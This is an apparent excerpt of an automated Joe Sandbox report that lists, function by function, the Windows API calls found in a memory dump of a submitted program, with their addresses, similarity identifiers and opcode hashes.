                                                                                                                                                                                                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                • Opcode ID: 83061e20d65b352d7ee9511052a740a405210c1ca24bdf524eb43d98e3cc71cd
                                                                                                                                                                                                                                                                • Instruction ID: 03de421cbff654618aac00a4950154a92d6ee3f14b90936e2ed32edf7a99da64
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83061e20d65b352d7ee9511052a740a405210c1ca24bdf524eb43d98e3cc71cd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48516EB15083009FD750EF24C886E6BBBE9FF89754F008A1DF59997252EB70D904CB96
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 007062E2
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00706315
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00706382
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                • Opcode ID: f7cbfe4f9d93287f5b6493a6c3d5b072de9aed0475a1a38baba912aaec684edc
                                                                                                                                                                                                                                                                • Instruction ID: 994b7bb773e5bbaaac496766a0cd174d93538346fc15bee23dc941e10437617e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7cbfe4f9d93287f5b6493a6c3d5b072de9aed0475a1a38baba912aaec684edc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA512A75900249EFDF20DF54D890AAE7BF6FB45360F108259F915972D0D734AD91CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 006DABF1
                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 006DAC0D
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 006DAC74
                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 006DACC6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 432972143-0
                                                                                                                                                                                                                                                                • Opcode ID: 5048f14fffc1b860e18c68337952a45e0fdcab34455c5f446f191f73b43a78bd
                                                                                                                                                                                                                                                                • Instruction ID: a6f3e7c864e2af0f380a691d5d44b4be262712d1c49ae3ae455c746aee66275e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5048f14fffc1b860e18c68337952a45e0fdcab34455c5f446f191f73b43a78bd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19310C30E68618AFFF35CBA58C047FA7767AB89330F04431BE485523D1C77589458756
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00689BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00689BB2
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00709001
                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006C7711,?,?,?,?,?), ref: 00709016
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0070905E
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006C7711,?,?,?), ref: 00709094
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                • Opcode ID: ec21751e967a046792547f45be657484a1bbd75690bf6ac2ff1fb77ebf86e4be
                                                                                                                                                                                                                                                                • Instruction ID: 563bd4982321b8b4e8656b791023126e50718da705f6b967542ff8cd041b7035
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec21751e967a046792547f45be657484a1bbd75690bf6ac2ff1fb77ebf86e4be
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8321A135600018EFDB269F94CC58EFB7BF9EF4A350F144269FA45472A2C739A990DB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0070280A
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00702824
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00702832
                                                                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00702840
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                • Opcode ID: 01f3177c0fdc9146dc8b47e300261abc78d7a08daa8865ac8b37cfae76278be3
                                                                                                                                                                                                                                                                • Instruction ID: dcdc663f5b00815e75d2aeccac142d428b4d4cad4495afbe5f5808c6e011c5c6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01f3177c0fdc9146dc8b47e300261abc78d7a08daa8865ac8b37cfae76278be3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C21B236204111EFE7159B24CC48F6A7795AF45324F24C358F5168B6D3DB79EC42C790
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 006ECE89
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 006ECEEA
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 006ECEFE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 234945975-0
                                                                                                                                                                                                                                                                • Opcode ID: b2ffe914a763c5988e9f2095f8132fdc78e68aabc52a1f20988c15275910e3ed
                                                                                                                                                                                                                                                                • Instruction ID: beccdf7b0771cf83dae1778141de482a57092e864e234e7d8cfbb0764150f822
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2ffe914a763c5988e9f2095f8132fdc78e68aabc52a1f20988c15275910e3ed
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7221B0B1501305EFDB20DF66C945BAA77FEEF00324F10851EE54692251EB74ED069B54
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 006DE1FD
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 006DE230
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006DE246
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006DE24D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                • Opcode ID: c9d61ff9ace108f5e12db7bc2a57f5e5e5a1dcfb5e86672ae652654ee9a1708a
                                                                                                                                                                                                                                                                • Instruction ID: 0933cfe72e15dc3b5bf2d61a339dc47d339f40ef68ab21620c879206ef99cff6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9d61ff9ace108f5e12db7bc2a57f5e5e5a1dcfb5e86672ae652654ee9a1708a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA110876D04258BBC702AFA89C05A9F7FAD9B46310F00831AF914D7390D775DA0487A4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0067604C
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00676060
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0067606A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                • Opcode ID: f1d4db99044eecd27bf5c43de2856d31300ffacb1c34186c7da92455a13385ed
                                                                                                                                                                                                                                                                • Instruction ID: ea9789bc735574af0e62fc9905b24d6bb1e4f977dee87f07c9e414fd3aa5710b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1d4db99044eecd27bf5c43de2856d31300ffacb1c34186c7da92455a13385ed
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B511A172101908FFEF125F94CD44EEA7B6AFF08364F008205FA0852110CB369C60DF90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,006713C6,00000000,00000000,?,006A301A,006713C6,00000000,00000000,00000000,?,006A328B,00000006,FlsSetValue), ref: 006A30A5
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,006A301A,006713C6,00000000,00000000,00000000,?,006A328B,00000006,FlsSetValue,00712290,FlsSetValue,00000000,00000364,?,006A2E46), ref: 006A30B1
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,006A301A,006713C6,00000000,00000000,00000000,?,006A328B,00000006,FlsSetValue,00712290,FlsSetValue,00000000), ref: 006A30BF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                • Opcode ID: 6d6724c7910ff8954a6222d7ab15c87ee31a24a678ae46d9388c64447203b192
                                                                                                                                                                                                                                                                • Instruction ID: 87d07e5a72c7b89641e273f09e4b467bdebea55dce233ec0377b87f718216b5f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d6724c7910ff8954a6222d7ab15c87ee31a24a678ae46d9388c64447203b192
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D01F732301332EBCB319B799C449977B9AAF07BA1B208720F905E7380CB25DD01CAE4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 006D2DC5
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 006D2DD6
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 006D2DDD
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 006D2DE4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                • Opcode ID: 806fa67157c03c18201fc8cb566045d2b8ef4b312fb39c18ef73c22943b2907f
                                                                                                                                                                                                                                                                • Instruction ID: 4fdd61997fa18cb6a346b43d3121e4ec08fb1ff3e92cfd9a76a53b948369dbf4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 806fa67157c03c18201fc8cb566045d2b8ef4b312fb39c18ef73c22943b2907f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEE092B1501224BBD7315B729C0EFEB7E6EEF96BA1F004316F105D11809EA9C841C6B0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00689639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00689693
                                                                                                                                                                                                                                                                  • Part of subcall function 00689639: SelectObject.GDI32(?,00000000), ref: 006896A2
                                                                                                                                                                                                                                                                  • Part of subcall function 00689639: BeginPath.GDI32(?), ref: 006896B9
                                                                                                                                                                                                                                                                  • Part of subcall function 00689639: SelectObject.GDI32(?,00000000), ref: 006896E2
                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00708887
                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 00708894
                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 007088A4
                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 007088B2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                • Opcode ID: f055b61192321cd29d024c6d34b94b389c61b5ff649454ec5b7b7590596ae458
                                                                                                                                                                                                                                                                • Instruction ID: 433806c6cd8e4c663475daaa991da80b0505b75db61312975b0acf19c2503e2e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f055b61192321cd29d024c6d34b94b389c61b5ff649454ec5b7b7590596ae458
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01F03A36041258FAEB136F94AC09FCA3E59AF06310F44C201FA11651E1CBB95551DBE9
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00677620: _wcslen.LIBCMT ref: 00677625
                                                                                                                                                                                                                                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 006E4ED4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                • String ID: *$LPT
                                                                                                                                                                                                                                                                • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                • Opcode ID: b9ad87e8329c9a8d23c0dfc4de5c31b0bf1fb44e4794fe6b434bea92bbd859fa
                                                                                                                                                                                                                                                                • Instruction ID: 657a00c8fef383a14a45a23f8a323f8d27d1a6f9065b2934310a6c3c5ebebd1a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9ad87e8329c9a8d23c0dfc4de5c31b0bf1fb44e4794fe6b434bea92bbd859fa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25918175A012449FDB14DF65C484EAABBF2BF84704F18809DE80A9F362CB35ED85CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 0069E30D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                • String ID: pow
                                                                                                                                                                                                                                                                • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                • Opcode ID: 710cee4a7dc7609cd123b3d99121ec68d9f9a7cde1a84a2b46d7742662117be2
                                                                                                                                                                                                                                                                • Instruction ID: c5bcdb747189de4208257a62bf4bebaaf1c277fc11c54ae588161124fa6613b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 710cee4a7dc7609cd123b3d99121ec68d9f9a7cde1a84a2b46d7742662117be2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8513B61A0C20296CF15B718CD013F93BEEEF41740F748D69E095427EAEB368D969E4A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #
                                                                                                                                                                                                                                                                • API String ID: 0-1885708031
